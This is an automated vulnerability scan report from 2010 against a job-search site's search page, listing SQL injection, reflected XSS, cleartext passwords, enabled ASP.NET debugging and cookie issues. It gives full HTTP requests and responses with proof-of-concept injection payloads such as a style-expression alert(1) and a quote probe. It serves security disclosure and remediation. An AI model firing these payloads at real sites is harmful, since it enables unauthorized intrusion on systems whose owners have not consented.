Report generated by XSS.CX at Mon Nov 08 09:30:07 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. SQL injection

2. Cross-site scripting (reflected)

2.1. http://boston.monster.com/search.aspx [q parameter]

2.2. http://boston.monster.com/search.aspx [q parameter]

2.3. http://boston.monster.com/search.aspx [Referer HTTP header]

3. Cleartext submission of password

4. Password field with autocomplete enabled

4.1. http://boston.monster.com/search.aspx

4.2. http://boston.monster.com/search.aspx

5. ASP.NET debugging enabled

6. Cookie scoped to parent domain

7. Cross-domain Referer leakage

8. Cross-domain script include

9. Cookie without HttpOnly flag set

10. Robots.txt file



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The cy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /search.aspx?q=%22boston.com%22&cy=us'&cnme=boston&sid=40&re=100&jto=1 HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 302 Found
Connection: close
Date: Mon, 08 Nov 2010 07:11:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error.aspx?M=System.Data.SyntaxErrorException&G=0a52be75-0a1e-4b17-a69f-fc13ed30e44b&N=401
Set-Cookie: ASP.NET_SessionId=fpak5545uqxpn245sa0cp0y2; path=/; HttpOnly
Set-Cookie: split_scsjsv=43; domain=.monster.com; expires=Tue, 08-Nov-2011 07:11:31 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fError.aspx%3fM%3dSystem.Data.SyntaxErrorException%26G%3d0a52be75-0a1e-4b17-a69f-fc13ed30e44b%26N%3d401">here</a>.<
...[SNIP]...

Request 2

GET /search.aspx?q=%22boston.com%22&cy=us''&cnme=boston&sid=40&re=100&jto=1 HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=12d1cy452dxsxz45olxmcwqy; path=/; HttpOnly
Set-Cookie: split_scsjsv=57; domain=.monster.com; expires=Tue, 08-Nov-2011 07:11:32 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247790922428099; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=q=%22boston.com%22&cy=us''&cnme=boston&sid=40&re=100&jto=1&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:11:32 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:11:32 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 140195
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://boston.monster.com/search.aspx [q parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The value of the q request parameter is copied into the name of an HTML tag attribute. The payload ab92b%20style%3dx%3aexpression(alert(1))%201a135ee77d4 was submitted in the q parameter. This input was echoed as ab92b style=x:expression(alert(1)) 1a135ee77d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search.aspx?q=%22boston.com%22ab92b%20style%3dx%3aexpression(alert(1))%201a135ee77d4&cy=us&cnme=boston&sid=40&re=100&jto=1 HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:09:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3wpp1455eq2zba55zco541ev; path=/; HttpOnly
Set-Cookie: split_scsjsv=29; domain=.monster.com; expires=Tue, 08-Nov-2011 07:09:55 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247789959535115; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=q=%22boston.com%22ab92b+style%3dx%3aexpression(alert(1))+1a135ee77d4&cy=us&cnme=boston&sid=40&re=100&jto=1&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:09:55 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:09:55 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 345808
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
_1_banner1_topContainer_90_728_1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" bordercolor="#000000" src="/services/AdTag.aspx?wd=728&ht=90&inst=&q="boston.com"ab92b style=x:expression(alert(1)) 1a135ee77d4&path=%2fSearch.aspx%3fq%3d%2522boston.com%2522ab92b%2520style%253dx%253aexpression(alert(1))%25201a135ee77d4%26cy%3dus%26cnme%3dboston%26sid%3d40%26re%3d100%26jto%3d1">
...[SNIP]...

2.2. http://boston.monster.com/search.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a69f6"style%3d"x%3aexpression(alert(1))"7e2a66ff8ee was submitted in the q parameter. This input was echoed as a69f6"style="x:expression(alert(1))"7e2a66ff8ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search.aspx?q=a69f6"style%3d"x%3aexpression(alert(1))"7e2a66ff8ee&cy=us&cnme=boston&sid=40&re=100&jto=1 HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c1jphgvj4c5g42v5z1wwz245; path=/; HttpOnly
Set-Cookie: split_scsjsv=81; domain=.monster.com; expires=Tue, 08-Nov-2011 07:10:23 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247790236164923; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=q=a69f6%22style%3d%22x%3aexpression(alert(1))%227e2a66ff8ee&cy=us&cnme=boston&sid=40&re=100&jto=1&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:10:23 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:10:23 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 343513
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
ame="AdFrame_1_banner1_topContainer_90_728_1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" bordercolor="#000000" src="/services/AdTag.aspx?wd=728&ht=90&inst=&q=a69f6"style="x:expression(alert(1))"7e2a66ff8ee&path=%2fSearch.aspx%3fq%3da69f6%2522style%253d%2522x%253aexpression(alert(1))%25227e2a66ff8ee%26cy%3dus%26cnme%3dboston%26sid%3d40%26re%3d100%26jto%3d1">
...[SNIP]...

2.3. http://boston.monster.com/search.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f079'-alert(1)-'b92a5d2db6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.aspx HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1f079'-alert(1)-'b92a5d2db6f

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s32yaoae0ne0awzsdpxdh0z0; path=/; HttpOnly
Set-Cookie: split_scsjsv=21; domain=.monster.com; expires=Tue, 08-Nov-2011 07:11:06 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247790671317581; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:11:07 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:11:07 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 350184
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
<img height="1" width="1" src="http://switch.atdmt.com/action/deumns_mymonsterlogin_1/v3/http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3d1f079'-alert(1)-'b92a5d2db6f/{1}" alt="" />
...[SNIP]...

3. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /search.aspx HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:09:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fp5k4q453nd2jg454uhkncek; path=/; HttpOnly
Set-Cookie: split_scsjsv=57; domain=.monster.com; expires=Tue, 08-Nov-2011 07:09:10 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247789513977275; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 350060
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="Search.aspx" id="aspnetForm" class="mainForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ctl00$ctl00$body$POD$persistentLogin$tbxPassword" type="password" id="ctl00_ctl00_ctl00_body_POD_persistentLogin_tbxPassword" class="text-field loginBoxFieldToClear" />
</div>
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. http://boston.monster.com/search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search.aspx HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:09:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fp5k4q453nd2jg454uhkncek; path=/; HttpOnly
Set-Cookie: split_scsjsv=57; domain=.monster.com; expires=Tue, 08-Nov-2011 07:09:10 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247789513977275; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 350060
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="Search.aspx" id="aspnetForm" class="mainForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ctl00$ctl00$body$POD$persistentLogin$tbxPassword" type="password" id="ctl00_ctl00_ctl00_body_POD_persistentLogin_tbxPassword" class="text-field loginBoxFieldToClear" />
</div>
...[SNIP]...

4.2. http://boston.monster.com/search.aspx  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search.aspx?q=%22boston.com%22&cy=us&cnme=boston&sid=40&re=100&jto=1 HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:09:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qvdhayn5natnh545h5fhzufg; path=/; HttpOnly
Set-Cookie: split_scsjsv=65; domain=.monster.com; expires=Tue, 08-Nov-2011 07:09:12 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247789529408504; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=q=%22boston.com%22&cy=us&cnme=boston&sid=40&re=100&jto=1&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:09:12 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:09:12 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154696
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1" id="aspnetForm" class="mainForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ctl00$ctl00$body$POD$persistentLogin$tbxPassword" type="password" id="ctl00_ctl00_ctl00_body_POD_persistentLogin_tbxPassword" class="text-field loginBoxFieldToClear" />
</div>
...[SNIP]...

5. ASP.NET debugging enabled  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://boston.monster.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: boston.monster.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 08 Nov 2010 07:09:13 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

6. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /search.aspx HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:09:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fp5k4q453nd2jg454uhkncek; path=/; HttpOnly
Set-Cookie: split_scsjsv=57; domain=.monster.com; expires=Tue, 08-Nov-2011 07:09:10 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247789513977275; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 350060
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...

7. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /search.aspx?q=%22boston.com%22&cy=us&cnme=boston&sid=40&re=100&jto=1 HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:09:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qvdhayn5natnh545h5fhzufg; path=/; HttpOnly
Set-Cookie: split_scsjsv=65; domain=.monster.com; expires=Tue, 08-Nov-2011 07:09:12 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247789529408504; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
